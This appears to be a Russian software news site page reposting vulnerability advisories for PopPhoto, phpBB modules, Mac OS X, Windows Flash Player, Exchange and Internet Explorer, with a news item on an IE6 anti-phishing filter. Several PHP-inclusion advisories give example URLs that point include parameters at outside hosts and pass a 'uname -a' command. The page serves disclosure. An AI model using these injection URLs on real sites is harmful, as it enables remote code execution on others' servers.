Новый софт   
  
  rss :  про сайт :  стартовой :  избранное :  скачать файлы :  опросы   
  фото приколы :  видео и ссылки :  телефоны и смартфоны :  новости :  безопасность :  обзоры программ :  наука и технологии :  все интересное 
 Новый софт - Ошибки и исправления

Методы продвижения партнерской программы

PHP-инклюдинг в PopPhoto

   

Программа: PopPhoto 3.5.4, возможно другие версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cfg[popphoto_base_path]" в сценарии resources/includes/popp.config.loader.inc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:
http://[target]/[path]/resources/includes/popp.config.loader.inc.php?
include_path=http://unsecured-systems.com/forum/

URL производителя: pixaria.com/popphoto/

Решение: Способов устранения уязвимости не существует в настоящее время.
 
Послать комментарий
комментариев (0)

PHP-инклюдинг в phpBB foing

   

Программа: foing (модуль для phpBB) 0.7.0 и более ранние версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценариях index.php, song.php, faq.php, list.php, gen_m3u.php и playlist.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:
http://victim/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a
http://victim/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&cmd=uname -a

URL производителя: foing.sourceforge.net

Решение: Способов устранения уязвимости не существует в настоящее время.
 
читать дальше (148 cлова) Послать комментарий
комментариев (0)

Множественные уязвимости в Mac OS X

   

Программа: Apple Macintosh OS X

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к важным данным, обойти ограничения безопасности, вызвать отказ в обслуживании и выполнить произвольный код на целевой системе.

1. Ошибка в AppKit framework позволяет приложению получить символы, введенные в защищенное поле формы в процессе сессии окна.
2. Уязвимость существует из-за ошибки в AppKit и ImageIO framework при обработке GIF и TIFF изображений. Удаленный пользователь может выполнить произвольный код на целевой системе.
3. Ошибка проверки границ данных существует в BOM компоненте при обработке архивов. Удаленный пользователь может выполнить произвольный код на целевой системе.
4. Уязвимость существует из-за недостаточной проверки входных данных в BOM компоненте. Удаленный пользователь может с помощью специально сформированного архива, записать произвольные файлы на систему за пределами указанной директории.
5. Целочисленное переполнение существует в компоненте CFNetwork при обработке chunked transfer encoding. Злоумышленник может заманить целевого пользователя на злонамеренный сайт и выполнить произвольный код на целевой системе.
6. Уязвимость существует из-за ошибки в ClamAV при обработке определенных почтовых сообщений. Удаленный пользователь может выполнить произвольный код на целевой системе.
7. Уязвимость существует из-за ошибки в компоненте CoreFoundation. Удаленный пользователь выполнить произвольный код на целевой системе.
8. Целочисленное переполнение существует в API "CFStringGetFileSystemRepresentation()". Удаленный пользователь может выполнить произвольный код на целевой системе.
9. Ошибка в компоненте CoreGraphics позволяет приложению получить символы, введенные в защищенное поле формы в процессе сессии окна, если включена опция "Enable access for assistive devices".
10. Ошибка обнаружена в Finder при обработке элементов Internet Location. Злоумышленник может указать тип Internet Location отличный от используемой схемы URL и выполнить произвольный код при запуске элемента Internet Location.
11. Ошибка проверки границы данных обнаружена в компоненте FTPServer при обработке имени файла. Удаленный пользователь может вызвать переполнение буфера и выполнить произвольный код на целевой системе.
12. Различные ошибки обнаружены в Flash Player. Удаленный пользователь может с помощью специально сформированного Flash файла выполнит произвольный код на целевой системе.
13. Целочисленное переполнение обнаружено в ImageIO framework при обработке JPEG изображений. Удаленный пользователь может вызвать отказ в обслуживании приложения или выполнить произвольный код на целевой системе.
14. Ошибка в компоненте Keychain позволяет приложению использовать элементы Keychain, даже если Keychain отключен.
15. Ошибка в компоненте LaunchServices при обработке длинных расширений файлов может позволить злоумышленнику обойти ограничения безопасности утилиты Download Validation.
16. Ошибка проверки границ данных обнаружена в библиотеке libcurl при обработке определенных URL. Удаленный пользователь может выполнить произвольный код на целевой системе.
17. Целочисленное переполнение обнаружено в компоненте Mail. Удаленный пользователь может с помощью специально сформированного сообщения, содержащего MacMIME-инкапсулированное вложение, выполнить произвольный код на целевой системе.
18. Уязвимость существует в компоненте Mail при обработке данных цвета в email сообщении. Удаленный пользователь может выполнить произвольный код на целевой системе.
19. Ошибка дизайна в MySQL Manager может позволить локальному пользователю получить доступ к базе данных с пустым паролем.
20. Ошибка проверки границ данных существует в компоненте Preview. Злоумышленник может вызвать переполнение стека, при переходе в специально сформированную иерархию директорий, и выполнить произвольный код на целевой системе.
21. Ошибка проверки границ данных существует при обработке font information и image data в PICT изображениях. Удаленный пользователь может с помощью специально сформированного PICT изображения вызвать переполнение стека, или переполнение кучи и выполнить произвольный код на целевой системе.
22. Разыменование нулевого указателя обнаружено в QuickTime Streaming Server при обработке QuickTime фильмов. Удаленный пользователь может аварийно завершить работу приложения.
23. Ошибка проверки границ данных существует в QuickTime Streaming Server пр обработке RTSP запросов. Удаленный пользователь может вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.
24. Уязвимость существует в Ruby. Злоумышленник может обойти ограничения безопасности.
25. Уязвимость существует в браузере Safari при обработке архивов, содержащих символические ссылки.

URL производителя: apple.com

Решение: Установите исправление с сайта производителя.
 
Послать комментарий
комментариев (0)

Выполнение произвольного кода в Microsoft Windows Flash Player

   

Программа:
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Millenium
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

Опасность: Критическая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнит произвольный код на целевой системе.

Уязвимости обнаружены в компоненте Macromedia Flash Player, поставляемом с некоторыми версиями Microsoft Windows. Более подробное описание уязвимости:
Выполнение произвольного кода в Flash Player
Выполнение произвольного кода в Macromedia Flash Player

URL производителя: microsoft.com

Решение: Установите исправление с сайта производителя.

Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=B2B8F9A8-4874-405A-9F0C-768B2631673A
 
читать дальше (9'178 cлова) Послать комментарий
комментариев (0)

Выполнение произвольного кода в Microsoft Exchange

   

Программа:
Microsoft Exchange 2000
Microsoft Exchange 2003

Опасность: Критическая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за ошибки Microsoft Exchange Calendar в функционале EXCDO (Exchange Collaboration Data Objects) и CDOEX (Collaboration Data Objects for Exchange) при обработке iCal и vCal свойств email сообщения. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный код на целевой системе.

URL производителя:

URL производителя: microsoft.com

Решение: Установите исправление с сайта производителя.

Microsoft Exchange Server 2000 with the Exchange 2000 Post-Service Pack 3 Update Rollup of August 2004(870540)
http://www.microsoft.com/downloads/details.aspx?FamilyId=E72C8F94-782F-4670-9221-E2E37EADB8EC
Microsoft Exchange Server 2003 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?FamilyId=F32574E0-F35C-4537-9AD0-524CB49AFE53
Microsoft Exchange Server 2003 Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=82AE4397-0982-4585-84C1-DC1AF6944A0F

 
читать дальше (5'852 cлова) Послать комментарий
комментариев (0)

Microsoft выпустила антифишинговый фильтр для IE6

   

Корпорация Microsoft выпустила антифишинговый фильтр для браузера Internet Explorer шестой версии.

Как сообщает eWeek со ссылкой на заявления представителей Microsoft, дополнение использует ту же самую технологию, что и браузер IE7. Правда, реализована эта технология несколько иначе. Если пользователь шестой версии Internet Explorer попадает на веб-сайт, применяющийся для проведения фишинг-атак, браузер автоматически блокирует возможность ввода персональной информации. В случае же с IE7 посетитель вредоносного ресурса перенаправляется на страницу с предупреждением. При этом в обоих случаях пользователь может продолжить работу с сайтом на свой страх и риск.


Антифишинговая технология Microsoft базируется на использовании "чёрных" списков, содержащих адреса фишерских сайтов, а также "белых" списков, составленных самим пользователем. Каждый раз при обработке фильтром для IE6 ссылки, не включённой в "белый" список, адрес передаётся для проверки на сервер Microsoft. Если окажется, что ссылка внесена в "чёрный" список, адресная строка браузера будет помечена красным цветом. Ресурсы, вызывающие подозрение, подсвечиваются жёлтым цветом.
Важно отметить, что фильтр для шестой версии браузера Microsoft можно инсталлировать, только если на компьютере установлена панель MSN Search Toolbar. Кроме того, необходима операционная система Windows ХР со вторым сервис-паком.

Антифишинговый фильтр распространяется бесплатно!

securitylab.ru/news/266884.php
 
Послать комментарий
комментариев (0)

PHP-инклюдинг в phpBB phpbb-Auction

   

Программа: phpbb-Auction (модуль для phpBB) 1.3m, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии "auction/auction_common.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:
http://[target]/[path]/autionauction_common.php?
phpbb_root_path=http://unsecured-systems.com/forum/

URL производителя: www.phpbb-auction.com

Решение: Способов устранения уязвимости не существует в настоящее время.
 
читать дальше (53 cлова) Послать комментарий
комментариев (0)

Раскрытие данных в Microsoft Internet Explorer

   

Программа: Microsoft Internet Explorer 6.x

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к важным данным на системе.
Уязвимость существует из-за ошибки при обработке перенаправлений URL в URI обработчике "mhtml:". Удаленный пользователь может получить доступ к документам, сохраненным с другого Web сайта.

Пример/Эксплоит:
http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/
URL производителя: www.microsoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.
 
Послать комментарий
комментариев (0)
RedTram
 Копирайт © 2010 Новый софт
 Все торговые марки и копирайты на этой странице являются собственностью соответствующих хозяев.
 Для связи с администрацией сайта, телефон в Киеве 5927467, ICQ 5714034
 Новый софт - Скачать программы, exe файлы, бизнес новости, скачать игры, технологии взлома и защиты, qip, icq
Работает на Geeklog 
Страница создана за 0.39 секунд